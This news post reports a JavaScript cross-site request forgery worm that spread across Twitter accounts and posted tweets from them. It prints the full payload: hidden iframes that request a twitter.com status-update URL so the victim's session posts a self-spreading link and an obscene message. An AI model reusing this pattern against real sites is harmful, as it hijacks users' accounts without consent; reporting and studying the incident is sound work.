JavaScript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

A JavaScript web compromise has apparently affected a large number of Twitter users.

On Sunday afternoon, a large number of Twitter accounts were compromised after their users were inadvertently lured into viewing the following URL,

http://pastehtml.com/view/1b7xk3b.html

which contains the following JavaScript code:

    // Two iframes are created and hidden so the victim never sees them.
    var el1 = document.createElement('iframe');
    var el2 = document.createElement('iframe');
    el1.style.visibility = "hidden";
    el2.style.visibility = "hidden";
    // Each iframe's src is a twitter.com URL that posts a status update through a plain GET request.
    // The browser attaches the victim's existing Twitter session cookie to that request automatically,
    // so the tweet goes out under the victim's account (a cross-site request forgery).
    el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; // tweets a link back to this page
    el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; // the obscene message
    document.getElementsByTagName("body")[0].appendChild(el1);
    document.getElementsByTagName("body")[0].appendChild(el2);

Some of the most prominent Twitter posters with very large follower lists, such as @zee, web cartoonist @oatmeal and tech blogger Robert Scoble (@scobleizer), have been affected, along with hundreds of thousands of their followers who also clicked on the malicious links.

The script causes a Twitter post to appear that directs browsers to execute the JavaScript source code, and then posts an embarrassingly obscene message about goats (you can see it in the code snippet above). It appears to affect only certain Windows-based browsers, as I was able to view and execute the source of the page safely using Chrome on Linux, and my own Twitter account was not compromised.

I haven't been able to determine whether any Mac, iOS or Android users have been compromised by this exploit yet, so please send me an update if you use Safari or another Mac browser or an alternative OS and you've been hit.

UPDATE: At 1:49 PM EDT on Sunday, Twitter notified users on its status blog that the compromise has been blocked on both the new and old versions of the Twitter web UI and that it is removing all the tweets that were sent with the cross-site compromise link and the offensive message.
